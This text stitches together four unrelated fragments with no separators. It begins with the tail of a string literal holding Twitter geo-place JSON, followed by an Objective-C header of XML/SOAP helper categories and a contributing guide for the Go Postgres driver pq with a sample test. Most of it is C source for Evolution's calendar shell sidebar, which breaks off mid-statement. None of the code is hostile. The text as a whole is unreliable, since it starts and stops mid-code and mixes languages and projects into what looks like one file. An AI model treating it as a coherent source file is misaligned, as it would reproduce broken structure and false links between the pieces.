""attributes"":{ }, ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -122.51368188, 37.70813196 ], [ -122.35845384, 37.70813196 ], [ -122.35845384, 37.83245301 ], [ -122.51368188, 37.83245301 ] ] ] }, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/5a110d312052166f.json"", ""id"":""5a110d312052166f"" }, { ""contained_within"":[ { ""country"":""United States"", ""place_type"":""country"", ""name"":""United States"", ""bounding_box"":null, ""attributes"":{ }, ""full_name"":""United States"", ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/96683cc9126741d1.json"", ""id"":""96683cc9126741d1"" } ], ""place_type"":""admin"", ""country"":""United States"", ""name"":""California"", ""full_name"":""California, US"", ""attributes"":{ }, ""bounding_box"":{ ""type"":""Polygon"", ""coordinates"":[ [ [ -124.482003, 32.528832 ], [ -114.131211, 32.528832 ], [ 
-114.131211, 42.009517 ], [ -124.482003, 42.009517 ] ] ] }, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/fbd6d2f5a4e4a15e.json"", ""id"":""fbd6d2f5a4e4a15e"" }, { ""contained_within"":[ ], ""place_type"":""country"", ""country"":""United States"", ""name"":""United States"", ""full_name"":""United States"", ""attributes"":{ }, ""bounding_box"":null, ""country_code"":""US"", ""url"":""http:\/\/api.twitter.com\/1\/geo\/id\/96683cc9126741d1.json"", ""id"":""96683cc9126741d1"" } ] } }"; } }
//
//  USAdditions.h
//  WSDLParser
//
//  Created by John Ogle on 9/5/08.
//  Copyright 2008 LightSPEED Technologies. All rights reserved.
//  Modified by Matthew Faupel on 2009-05-06 to use NSDate instead of
//  NSCalendarDate (for iPhone compatibility).
//  Modifications copyright (c) 2009 Micropraxis Ltd.
//  NSData (MBBase64) category taken from "MiloBird" at
//  http://www.cocoadev.com/index.pl?BaseSixtyFour
//

#import <Foundation/Foundation.h>
#import <libxml/tree.h>

@interface NSString (USAdditions)

- (NSString *)stringByEscapingXML;
- (NSString *)stringByUnescapingXML;
- (const xmlChar *)xmlString;
- (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix;
+ (NSString *)deserializeNode:(xmlNodePtr)cur;

@end

@interface NSNumber (USAdditions)

- (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix;
+ (NSNumber *)deserializeNode:(xmlNodePtr)cur;

@end

@interface NSDate (USAdditions)

- (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix;
+ (NSDate *)deserializeNode:(xmlNodePtr)cur;

@end

@interface NSData (USAdditions)

- (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix;
+ (NSData *)deserializeNode:(xmlNodePtr)cur;

@end

@interface NSData (MBBase64)

+ (id)dataWithBase64EncodedString:(NSString *)string;  // Padding '=' characters are optional. Whitespace is ignored.
- (NSString *)base64Encoding;

@end

@interface USBoolean : NSObject {
    BOOL value;
}

@property (assign) BOOL boolValue;

- (id)initWithBool:(BOOL)aValue;
- (NSString *)stringValue;
- (xmlNodePtr)xmlNodeForDoc:(xmlDocPtr)doc elementName:(NSString *)elName elementNSPrefix:(NSString *)elNSPrefix;
+ (USBoolean *)deserializeNode:(xmlNodePtr)cur;

@end

@interface SOAPFault : NSObject {
    NSString *faultcode;
    NSString *faultstring;
    NSString *faultactor;
    NSString *detail;
}

@property (nonatomic, retain) NSString *faultcode;
@property (nonatomic, retain) NSString *faultstring;
@property (nonatomic, retain) NSString *faultactor;
@property (nonatomic, retain) NSString *detail;
@property (readonly) NSString *simpleFaultString;

+ (SOAPFault *)deserializeNode:(xmlNodePtr)cur;

@end
## Contributing to pq

`pq` has a backlog of pull requests, but contributions are still very much welcome. You can
help with patch review, submitting bug reports, or adding new functionality. There is no
formal style guide, but please conform to the style of existing code and general Go
formatting conventions when submitting patches.

### Patch review

Help review existing open pull requests by commenting on the code or proposed
functionality.

### Bug reports

We appreciate any bug reports, but especially ones with self-contained (doesn't depend on
code outside of pq), minimal (can't be simplified further) test cases. It's especially
helpful if you can submit a pull request with just the failing test case (you'll probably
want to pattern it after the tests in
[conn_test.go](https://github.com/lib/pq/blob/master/conn_test.go)); a sketch of such a
test follows at the end of this document.

### New functionality

There are a number of pending patches for new functionality, so additional feature patches
will take a while to merge. Still, patches are generally reviewed based on usefulness and
complexity in addition to time-in-queue, so if you have a knockout idea, take a shot. Feel
free to open an issue discussing your proposed patch beforehand.
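### Example: a self-contained failing test case

The sketch below illustrates the shape of a good bug-report test, patterned loosely after
the tests in conn_test.go. The connection string and the query are hypothetical
placeholders; substitute whatever actually reproduces the bug you are reporting.

```go
package pq_test

import (
	"database/sql"
	"testing"

	_ "github.com/lib/pq"
)

// TestScanNullInt64 is a hypothetical minimal repro: it depends only on
// database/sql, pq itself, and a reachable test database.
func TestScanNullInt64(t *testing.T) {
	// Placeholder connection string; adjust to your test environment.
	db, err := sql.Open("postgres", "dbname=pqgotest sslmode=disable")
	if err != nil {
		t.Fatal(err)
	}
	defer db.Close()

	// Replace this query with the smallest statement that triggers the bug.
	var n sql.NullInt64
	if err := db.QueryRow("SELECT NULL").Scan(&n); err != nil {
		t.Fatal(err)
	}
	if n.Valid {
		t.Errorf("expected an invalid (NULL) NullInt64, got %+v", n)
	}
}
```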
/*
 * Copyright (C) 2014 Red Hat, Inc. (www.redhat.com)
 *
 * This program is free software; you can redistribute it and/or modify it
 * under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
 * or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
 * for more details.
 *
 * You should have received a copy of the GNU Lesser General Public License
 * along with this program; if not, see <http://www.gnu.org/licenses/>.
 *
 * Authors: Milan Crha <[email protected]>
 */

#include "evolution-config.h"

#include <string.h>
#include <glib/gi18n.h>

#include "e-util/e-util.h"
#include "calendar/gui/comp-util.h"

#include "e-cal-base-shell-view.h"
#include "e-cal-base-shell-sidebar.h"

#define E_CAL_BASE_SHELL_SIDEBAR_GET_PRIVATE(obj) \
    (G_TYPE_INSTANCE_GET_PRIVATE \
    ((obj), E_TYPE_CAL_BASE_SHELL_SIDEBAR, ECalBaseShellSidebarPrivate))

struct _ECalBaseShellSidebarPrivate {
    ECalendar *date_navigator;     /* not referenced, is inside itself */
    GtkWidget *paned;              /* not referenced, is inside itself */
    ESourceSelector *selector;     /* not referenced, is inside itself */
    gulong date_navigator_scroll_event_handler_id;

    GHashTable *selected_uids;     /* source UID -> cancellable */
};

enum {
    PROP_0,
    PROP_DATE_NAVIGATOR,
    PROP_SELECTOR
};

enum {
    CLIENT_OPENED,
    CLIENT_CLOSED,
    LAST_SIGNAL
};

static guint signals[LAST_SIGNAL];

G_DEFINE_DYNAMIC_TYPE (ECalBaseShellSidebar, e_cal_base_shell_sidebar, E_TYPE_SHELL_SIDEBAR)

static gboolean
cal_base_shell_sidebar_map_uid_to_source (GValue *value,
                                          GVariant *variant,
                                          gpointer user_data)
{
    ESourceRegistry *registry;
    ESource *source;
    const gchar *uid;

    registry = E_SOURCE_REGISTRY (user_data);
    uid = g_variant_get_string (variant, NULL);
    if (uid != NULL && *uid != '\0')
        source = e_source_registry_ref_source (registry, uid);
    else
        source = e_source_registry_ref_default_calendar (registry);
    g_value_take_object (value, source);

    return (source != NULL);
}

static GVariant *
cal_base_shell_sidebar_map_source_to_uid (const GValue *value,
                                          const GVariantType *expected_type,
                                          gpointer user_data)
{
    GVariant *variant = NULL;
    ESource *source;

    source = g_value_get_object (value);
    if (source != NULL) {
        const gchar *uid;

        uid = e_source_get_uid (source);
        variant = g_variant_new_string (uid);
    }

    return variant;
}

static void
cal_base_shell_sidebar_restore_state_cb (EShellWindow *shell_window,
                                         EShellView *shell_view,
                                         EShellSidebar *shell_sidebar)
{
    ECalBaseShellSidebarPrivate *priv;
    ESourceRegistry *registry;
    ESourceSelector *selector;
    GSettings *settings;
    const gchar *primary_source_key = NULL;

    priv = E_CAL_BASE_SHELL_SIDEBAR (shell_sidebar)->priv;

    g_signal_handlers_disconnect_by_func (
        shell_window, cal_base_shell_sidebar_restore_state_cb, shell_sidebar);

    switch (e_cal_base_shell_view_get_source_type (shell_view)) {
        case E_CAL_CLIENT_SOURCE_TYPE_EVENTS:
            primary_source_key = "primary-calendar";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_MEMOS:
            primary_source_key = "primary-memos";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_TASKS:
            primary_source_key = "primary-tasks";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_LAST:
            g_warn_if_reached ();
            return;
    }

    selector = E_SOURCE_SELECTOR (priv->selector);
    registry = e_source_selector_get_registry (selector);

    /* Bind GObject properties to settings keys. */

    settings = e_util_ref_settings ("org.gnome.evolution.calendar");

    g_settings_bind_with_mapping (
        settings, primary_source_key,
        selector, "primary-selection",
        G_SETTINGS_BIND_DEFAULT,
        cal_base_shell_sidebar_map_uid_to_source,
        cal_base_shell_sidebar_map_source_to_uid,
        g_object_ref (registry),
        (GDestroyNotify) g_object_unref);

    if (priv->date_navigator) {
        if (e_shell_window_is_main_instance (shell_window)) {
            g_settings_bind (
                settings, "date-navigator-pane-position",
                priv->paned, "vposition",
                G_SETTINGS_BIND_DEFAULT);
        } else {
            g_settings_bind (
                settings, "date-navigator-pane-position-sub",
                priv->paned, "vposition",
                G_SETTINGS_BIND_DEFAULT |
                G_SETTINGS_BIND_GET_NO_CHANGES);
        }
    }

    g_object_unref (settings);
}

static guint32
cal_base_shell_sidebar_check_state (EShellSidebar *shell_sidebar)
{
    ECalBaseShellSidebar *cal_base_shell_sidebar;
    ESourceSelector *selector;
    ESourceRegistry *registry;
    ESource *source, *clicked_source;
    gboolean is_writable = FALSE;
    gboolean is_removable = FALSE;
    gboolean is_remote_creatable = FALSE;
    gboolean is_remote_deletable = FALSE;
    gboolean in_collection = FALSE;
    gboolean refresh_supported = FALSE;
    gboolean has_primary_source = FALSE;
    guint32 state = 0;

    cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (shell_sidebar);
    selector = e_cal_base_shell_sidebar_get_selector (cal_base_shell_sidebar);
    source = e_source_selector_ref_primary_selection (selector);
    registry = e_source_selector_get_registry (selector);

    if (source != NULL) {
        EClient *client;
        ESource *collection;

        has_primary_source = TRUE;
        is_writable = e_source_get_writable (source);
        is_removable = e_source_get_removable (source);
        is_remote_creatable = e_source_get_remote_creatable (source);
        is_remote_deletable = e_source_get_remote_deletable (source);

        collection = e_source_registry_find_extension (
            registry, source, E_SOURCE_EXTENSION_COLLECTION);
        if (collection != NULL) {
            in_collection = TRUE;
            g_object_unref (collection);
        }

        client = e_client_selector_ref_cached_client (
            E_CLIENT_SELECTOR (selector), source);

        if (client != NULL) {
            refresh_supported = e_client_check_refresh_supported (client);
            g_object_unref (client);
        }

        g_object_unref (source);
    }

    clicked_source = e_cal_base_shell_view_get_clicked_source (e_shell_sidebar_get_shell_view (shell_sidebar));
    if (clicked_source && clicked_source == source)
        state |= E_CAL_BASE_SHELL_SIDEBAR_CLICKED_SOURCE_IS_PRIMARY;
    if (clicked_source && e_source_has_extension (clicked_source, E_SOURCE_EXTENSION_COLLECTION))
        state |= E_CAL_BASE_SHELL_SIDEBAR_CLICKED_SOURCE_IS_COLLECTION;

    if (e_source_selector_count_total (selector) == e_source_selector_count_selected (selector))
        state |= E_CAL_BASE_SHELL_SIDEBAR_ALL_SOURCES_SELECTED;

    if (has_primary_source)
        state |= E_CAL_BASE_SHELL_SIDEBAR_HAS_PRIMARY_SOURCE;
    if (is_writable)
        state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_WRITABLE;
    if (is_removable)
        state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_REMOVABLE;
    if (is_remote_creatable)
        state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_REMOTE_CREATABLE;
    if (is_remote_deletable)
        state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IS_REMOTE_DELETABLE;
    if (in_collection)
        state |= E_CAL_BASE_SHELL_SIDEBAR_PRIMARY_SOURCE_IN_COLLECTION;
    if (refresh_supported)
        state |= E_CAL_BASE_SHELL_SIDEBAR_SOURCE_SUPPORTS_REFRESH;

    return state;
}

static gboolean
cal_base_shell_sidebar_date_navigator_scroll_event_cb (ECalBaseShellSidebar *cal_base_shell_sidebar,
                                                       GdkEventScroll *event,
                                                       ECalendar *date_navigator)
{
    ECalendarItem *calitem;
    gint year = -1, month = -1;
    GdkScrollDirection direction;

    calitem = e_calendar_get_item (date_navigator);
    e_calendar_item_get_first_month (calitem, &year, &month);
    if (year == -1 || month == -1)
        return FALSE;

    direction = event->direction;

    if (direction == GDK_SCROLL_SMOOTH) {
        static gdouble total_delta_y = 0.0;

        total_delta_y += event->delta_y;

        if (total_delta_y >= 1.0) {
            total_delta_y = 0.0;
            direction = GDK_SCROLL_DOWN;
        } else if (total_delta_y <= -1.0) {
            total_delta_y = 0.0;
            direction = GDK_SCROLL_UP;
        } else {
            return FALSE;
        }
    }

    switch (direction) {
        case GDK_SCROLL_UP:
            month--;
            if (month < 0) {
                year--;
                month += 12;
            }
            break;

        case GDK_SCROLL_DOWN:
            month++;
            if (month >= 12) {
                year++;
                month -= 12;
            }
            break;

        default:
            g_return_val_if_reached (FALSE);
    }

    e_calendar_item_set_first_month (calitem, year, month);

    return TRUE;
}

typedef struct _OpenClientData {
    const gchar *extension_name;
    ECalBaseShellSidebar *sidebar;
    ESource *source;
    EClient *client;
    gboolean was_cancelled;
} OpenClientData;

static void
open_client_data_free (gpointer pdata)
{
    OpenClientData *data = pdata;

    if (data) {
        /* To free the cancellable in the 'value' pair, which is useless now */
        g_hash_table_insert (data->sidebar->priv->selected_uids,
            g_strdup (e_source_get_uid (data->source)), NULL);

        if (data->client) {
            g_signal_emit (data->sidebar, signals[CLIENT_OPENED], 0, data->client);
        } else if (!data->was_cancelled) {
            ESourceSelector *selector = e_cal_base_shell_sidebar_get_selector (data->sidebar);
            e_source_selector_unselect_source (selector, data->source);
        }

        g_clear_object (&data->sidebar);
        g_clear_object (&data->source);
        g_clear_object (&data->client);
        g_slice_free (OpenClientData, data);
    }
}

static void
e_cal_base_shell_sidebar_open_client_thread (EAlertSinkThreadJobData *job_data,
                                             gpointer user_data,
                                             GCancellable *cancellable,
                                             GError **error)
{
    EClientSelector *selector;
    OpenClientData *data = user_data;
    GError *local_error = NULL;

    g_return_if_fail (data != NULL);

    selector = E_CLIENT_SELECTOR (e_cal_base_shell_sidebar_get_selector (data->sidebar));

    data->client = e_client_selector_get_client_sync (
        selector, data->source, TRUE, (guint32) -1, cancellable, &local_error);

    data->was_cancelled = g_error_matches (local_error, G_IO_ERROR, G_IO_ERROR_CANCELLED);

    e_util_propagate_open_source_job_error (job_data, data->extension_name, local_error, error);
}

static void
e_cal_base_shell_sidebar_ensure_source_opened (ECalBaseShellSidebar *sidebar,
                                               ESource *source)
{
    OpenClientData *data;
    EShellView *shell_view;
    EActivity *activity;
    gchar *description = NULL, *alert_ident = NULL, *alert_arg_0 = NULL, *display_name;
    const gchar *extension_name = NULL;

    g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar));
    g_return_if_fail (E_IS_SOURCE (source));

    /* Skip it when it's already opening or opened */
    if (g_hash_table_contains (sidebar->priv->selected_uids, e_source_get_uid (source)))
        return;

    shell_view = e_shell_sidebar_get_shell_view (E_SHELL_SIDEBAR (sidebar));

    switch (e_cal_base_shell_view_get_source_type (shell_view)) {
        case E_CAL_CLIENT_SOURCE_TYPE_EVENTS:
            extension_name = E_SOURCE_EXTENSION_CALENDAR;
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_MEMOS:
            extension_name = E_SOURCE_EXTENSION_MEMO_LIST;
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_TASKS:
            extension_name = E_SOURCE_EXTENSION_TASK_LIST;
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_LAST:
            g_warn_if_reached ();
            return;
    }

    display_name = e_util_get_source_full_name (
        e_shell_get_registry (e_shell_backend_get_shell (e_shell_view_get_shell_backend (shell_view))),
        source);

    if (!e_util_get_open_source_job_info (extension_name, display_name,
        &description, &alert_ident, &alert_arg_0)) {
        g_free (display_name);
        g_warn_if_reached ();
        return;
    }

    g_free (display_name);

    data = g_slice_new0 (OpenClientData);
    data->extension_name = extension_name; /* no need to copy, it's a static string */
    data->sidebar = g_object_ref (sidebar);
    data->source = g_object_ref (source);

    activity = e_shell_view_submit_thread_job (
        shell_view, description, alert_ident, alert_arg_0,
        e_cal_base_shell_sidebar_open_client_thread, data,
        open_client_data_free);

    if (activity) {
        GCancellable *cancellable;

        cancellable = e_activity_get_cancellable (activity);

        g_hash_table_insert (sidebar->priv->selected_uids,
            g_strdup (e_source_get_uid (source)),
            g_object_ref (cancellable));

        g_object_unref (activity);
    }

    g_free (description);
    g_free (alert_ident);
    g_free (alert_arg_0);
}

static void
e_cal_base_shell_sidebar_primary_selection_changed_cb (ESourceSelector *selector,
                                                       EShellSidebar *sidebar)
{
    g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar));

    e_shell_view_update_actions (e_shell_sidebar_get_shell_view (sidebar));
}

static void
e_cal_base_shell_sidebar_source_selected (ESourceSelector *selector,
                                          ESource *source,
                                          ECalBaseShellSidebar *sidebar)
{
    g_return_if_fail (E_IS_SOURCE_SELECTOR (selector));
    g_return_if_fail (E_IS_SOURCE (source));
    g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar));

    if (!g_hash_table_contains (sidebar->priv->selected_uids, e_source_get_uid (source))) {
        e_cal_base_shell_sidebar_ensure_source_opened (sidebar, source);
    }
}

static void
e_cal_base_shell_sidebar_source_unselected (ESourceSelector *selector,
                                            ESource *source,
                                            ECalBaseShellSidebar *sidebar)
{
    g_return_if_fail (E_IS_SOURCE_SELECTOR (selector));
    g_return_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar));

    if (g_hash_table_remove (sidebar->priv->selected_uids, e_source_get_uid (source)))
        g_signal_emit (sidebar, signals[CLIENT_CLOSED], 0, source);
}

typedef struct {
    ESource *source;
    ESource *destination;
    gboolean do_copy;
    ICalComponent *icomp;
    EClientSelector *selector;
} TransferItemToData;

static void
transfer_item_to_data_free (gpointer ptr)
{
    TransferItemToData *titd = ptr;

    if (titd) {
        g_clear_object (&titd->source);
        g_clear_object (&titd->destination);
        g_clear_object (&titd->selector);
        g_clear_object (&titd->icomp);
        g_slice_free (TransferItemToData, titd);
    }
}

static void
cal_base_shell_sidebar_transfer_thread (EAlertSinkThreadJobData *job_data,
                                        gpointer user_data,
                                        GCancellable *cancellable,
                                        GError **error)
{
    TransferItemToData *titd = user_data;
    EClient *source_client, *destination_client;

    g_return_if_fail (titd != NULL);
    g_return_if_fail (E_IS_SOURCE (titd->source));
    g_return_if_fail (E_IS_SOURCE (titd->destination));
    g_return_if_fail (E_IS_CLIENT_SELECTOR (titd->selector));
    g_return_if_fail (titd->icomp != NULL);

    source_client = e_client_selector_get_client_sync (
        titd->selector, titd->source, FALSE, 30, cancellable, error);
    if (!source_client)
        return;

    destination_client = e_client_selector_get_client_sync (
        titd->selector, titd->destination, FALSE, 30, cancellable, error);
    if (!destination_client) {
        g_object_unref (source_client);
        return;
    }

    cal_comp_transfer_item_to_sync (E_CAL_CLIENT (source_client), E_CAL_CLIENT (destination_client),
        titd->icomp, titd->do_copy, cancellable, error);

    g_clear_object (&source_client);
    g_clear_object (&destination_client);
}

static gboolean
e_cal_base_shell_sidebar_selector_data_dropped (ESourceSelector *selector,
                                                GtkSelectionData *selection_data,
                                                ESource *destination,
                                                GdkDragAction action,
                                                guint info,
                                                ECalBaseShellSidebar *sidebar)
{
    ICalComponent *icomp = NULL;
    EActivity *activity;
    EShellView *shell_view;
    ESource *source = NULL;
    ESourceRegistry *registry;
    gchar **segments;
    gchar *source_uid = NULL;
    gchar *message = NULL;
    gchar *display_name = NULL;
    const gchar *alert_ident = NULL;
    const guchar *data;
    gboolean do_copy;
    TransferItemToData *titd;

    g_return_val_if_fail (E_IS_SOURCE_SELECTOR (selector), FALSE);
    g_return_val_if_fail (E_IS_SOURCE (destination), FALSE);
    g_return_val_if_fail (E_IS_CAL_BASE_SHELL_SIDEBAR (sidebar), FALSE);

    data = gtk_selection_data_get_data (selection_data);
    g_return_val_if_fail (data != NULL, FALSE);

    segments = g_strsplit ((const gchar *) data, "\n", 2);
    if (g_strv_length (segments) != 2)
        goto exit;

    source_uid = g_strdup (segments[0]);
    icomp = i_cal_parser_parse_string (segments[1]);

    if (!icomp)
        goto exit;

    registry = e_source_selector_get_registry (selector);
    source = e_source_registry_ref_source (registry, source_uid);
    if (!source)
        goto exit;

    display_name = e_util_get_source_full_name (registry, destination);

    do_copy = action == GDK_ACTION_COPY ? TRUE : FALSE;

    shell_view = e_shell_sidebar_get_shell_view (E_SHELL_SIDEBAR (sidebar));

    switch (e_cal_base_shell_view_get_source_type (shell_view)) {
        case E_CAL_CLIENT_SOURCE_TYPE_EVENTS:
            message = do_copy ?
                g_strdup_printf (_("Copying an event into the calendar “%s”"), display_name) :
                g_strdup_printf (_("Moving an event into the calendar “%s”"), display_name);
            alert_ident = do_copy ? "calendar:failed-copy-event" : "calendar:failed-move-event";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_MEMOS:
            message = do_copy ?
                g_strdup_printf (_("Copying a memo into the memo list “%s”"), display_name) :
                g_strdup_printf (_("Moving a memo into the memo list “%s”"), display_name);
            alert_ident = do_copy ? "calendar:failed-copy-memo" : "calendar:failed-move-memo";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_TASKS:
            message = do_copy ?
                g_strdup_printf (_("Copying a task into the task list “%s”"), display_name) :
                g_strdup_printf (_("Moving a task into the task list “%s”"), display_name);
            alert_ident = do_copy ? "calendar:failed-copy-task" : "calendar:failed-move-task";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_LAST:
            g_warn_if_reached ();
            goto exit;
    }

    titd = g_slice_new0 (TransferItemToData);
    titd->source = g_object_ref (source);
    titd->destination = g_object_ref (destination);
    titd->do_copy = do_copy;
    titd->icomp = icomp;
    titd->selector = g_object_ref (selector);

    icomp = NULL;

    activity = e_shell_view_submit_thread_job (shell_view, message, alert_ident,
        display_name, cal_base_shell_sidebar_transfer_thread, titd,
        transfer_item_to_data_free);

    g_clear_object (&activity);

 exit:
    g_clear_object (&icomp);
    g_clear_object (&source);
    g_free (message);
    g_free (source_uid);
    g_free (display_name);
    g_strfreev (segments);

    return TRUE;
}

static void
cancel_and_unref (gpointer data)
{
    GCancellable *cancellable = data;

    if (cancellable) {
        g_cancellable_cancel (cancellable);
        g_object_unref (cancellable);
    }
}

static void
cal_base_shell_sidebar_get_property (GObject *object,
                                     guint property_id,
                                     GValue *value,
                                     GParamSpec *pspec)
{
    switch (property_id) {
        case PROP_DATE_NAVIGATOR:
            g_value_set_object (
                value,
                e_cal_base_shell_sidebar_get_date_navigator (
                E_CAL_BASE_SHELL_SIDEBAR (object)));
            return;

        case PROP_SELECTOR:
            g_value_set_object (
                value,
                e_cal_base_shell_sidebar_get_selector (
                E_CAL_BASE_SHELL_SIDEBAR (object)));
            return;
    }

    G_OBJECT_WARN_INVALID_PROPERTY_ID (object, property_id, pspec);
}

static void
e_cal_base_shell_sidebar_update_calendar_margin_cb (GObject *object,
                                                    GParamSpec *pspec,
                                                    gpointer *user_data)
{
    EShellWindow *shell_window;
    GtkWidget *calendar;
    gboolean switcher_visible;

    shell_window = E_SHELL_WINDOW (object);
    calendar = GTK_WIDGET (user_data);
    switcher_visible = e_shell_window_get_switcher_visible (shell_window);

    if (switcher_visible)
        gtk_widget_set_margin_bottom (calendar, 0);
    else
        gtk_widget_set_margin_bottom (calendar, 6);
}

static void
cal_base_shell_sidebar_constructed (GObject *object)
{
    EShellWindow *shell_window;
    EShellView *shell_view;
    EShellBackend *shell_backend;
    EShell *shell;
    EClientCache *client_cache;
    const gchar *source_extension = NULL, *selector_name = NULL, *restore_state_signal = NULL;
    ECalBaseShellSidebar *cal_base_shell_sidebar;
    GtkWidget *container, *widget;
    AtkObject *a11y;
    gboolean add_navigator = FALSE;

    /* Chain up to parent's constructed() method. */
    G_OBJECT_CLASS (e_cal_base_shell_sidebar_parent_class)->constructed (object);

    cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (object);
    shell_view = e_shell_sidebar_get_shell_view (E_SHELL_SIDEBAR (object));
    shell_backend = e_shell_view_get_shell_backend (shell_view);
    shell_window = e_shell_view_get_shell_window (shell_view);
    shell = e_shell_backend_get_shell (shell_backend);

    switch (e_cal_base_shell_view_get_source_type (shell_view)) {
        case E_CAL_CLIENT_SOURCE_TYPE_EVENTS:
            source_extension = E_SOURCE_EXTENSION_CALENDAR;
            selector_name = _("Calendar Selector");
            restore_state_signal = "shell-view-created::calendar";
            add_navigator = TRUE;
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_MEMOS:
            source_extension = E_SOURCE_EXTENSION_MEMO_LIST;
            selector_name = _("Memo List Selector");
            restore_state_signal = "shell-view-created::memos";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_TASKS:
            source_extension = E_SOURCE_EXTENSION_TASK_LIST;
            selector_name = _("Task List Selector");
            restore_state_signal = "shell-view-created::tasks";
            break;
        case E_CAL_CLIENT_SOURCE_TYPE_LAST:
            g_warn_if_reached ();
            return;
    }

    client_cache = e_shell_get_client_cache (shell);

    container = GTK_WIDGET (object);

    widget = e_paned_new (GTK_ORIENTATION_VERTICAL);
    gtk_container_add (GTK_CONTAINER (container), widget);
    cal_base_shell_sidebar->priv->paned = widget;

    container = widget;

    widget = gtk_box_new (GTK_ORIENTATION_VERTICAL, 6);
    gtk_paned_pack1 (GTK_PANED (container), widget, TRUE, TRUE);

    container = widget;

    widget = gtk_scrolled_window_new (NULL, NULL);
    gtk_scrolled_window_set_policy (
        GTK_SCROLLED_WINDOW (widget),
        GTK_POLICY_AUTOMATIC,
        GTK_POLICY_AUTOMATIC);
    gtk_box_pack_start (GTK_BOX (container), widget, TRUE, TRUE, 0);

    container = widget;

    widget = e_client_selector_new (client_cache, source_extension);
    a11y = gtk_widget_get_accessible (widget);
    atk_object_set_name (a11y, selector_name);
    cal_base_shell_sidebar->priv->selector = E_SOURCE_SELECTOR (widget);
    gtk_container_add (GTK_CONTAINER (container), widget);

    e_source_selector_load_groups_setup (cal_base_shell_sidebar->priv->selector,
        e_shell_view_get_state_key_file (shell_view));

    if (add_navigator) {
        ECalendarItem *calitem;

        container = cal_base_shell_sidebar->priv->paned;

        widget = e_calendar_new ();
        gtk_widget_set_margin_top (widget, 6);
        gtk_widget_set_margin_start (widget, 6);
        gtk_widget_set_margin_end (widget, 6);
        calitem = e_calendar_get_item (E_CALENDAR (widget));
        e_calendar_item_set_days_start_week_sel (calitem, 9);
        e_calendar_item_set_max_days_sel (calitem, 42);
        gtk_paned_pack2 (GTK_PANED (container), widget, FALSE, FALSE);
        cal_base_shell_sidebar->priv->date_navigator = E_CALENDAR (widget);
        gtk_widget_show (widget);

        gnome_canvas_item_set (
            GNOME_CANVAS_ITEM (e_calendar_get_item (cal_base_shell_sidebar->priv->date_navigator)),
            "move-selection-when-moving", FALSE,
            NULL);

        cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id =
            g_signal_connect_swapped (
                cal_base_shell_sidebar->priv->date_navigator, "scroll-event",
                G_CALLBACK (cal_base_shell_sidebar_date_navigator_scroll_event_cb),
                cal_base_shell_sidebar);
    }

    gtk_widget_show_all (GTK_WIDGET (object));

    gtk_drag_dest_set (
        GTK_WIDGET (cal_base_shell_sidebar->priv->selector),
        GTK_DEST_DEFAULT_ALL, NULL, 0, GDK_ACTION_COPY | GDK_ACTION_MOVE);

    e_drag_dest_add_calendar_targets (GTK_WIDGET (cal_base_shell_sidebar->priv->selector));

    g_signal_connect (shell_window, "notify::switcher-visible",
        G_CALLBACK (e_cal_base_shell_sidebar_update_calendar_margin_cb), widget);

    g_signal_connect (cal_base_shell_sidebar->priv->selector, "data-dropped",
        G_CALLBACK (e_cal_base_shell_sidebar_selector_data_dropped), cal_base_shell_sidebar);

    g_signal_connect (cal_base_shell_sidebar->priv->selector, "primary-selection-changed",
        G_CALLBACK (e_cal_base_shell_sidebar_primary_selection_changed_cb), cal_base_shell_sidebar);

    g_signal_connect (cal_base_shell_sidebar->priv->selector, "source-selected",
        G_CALLBACK (e_cal_base_shell_sidebar_source_selected), cal_base_shell_sidebar);

    g_signal_connect (cal_base_shell_sidebar->priv->selector, "source-unselected",
        G_CALLBACK (e_cal_base_shell_sidebar_source_unselected), cal_base_shell_sidebar);

    /* Restore widget state from the last session once
     * the shell view is fully initialized and visible. */
    g_signal_connect (
        shell_window, restore_state_signal,
        G_CALLBACK (cal_base_shell_sidebar_restore_state_cb),
        cal_base_shell_sidebar);
}

static void
cal_base_shell_sidebar_dispose (GObject *object)
{
    ECalBaseShellSidebar *cal_base_shell_sidebar;

    cal_base_shell_sidebar = E_CAL_BASE_SHELL_SIDEBAR (object);

    if (cal_base_shell_sidebar->priv->date_navigator_scroll_event_handler_id > 0 &&
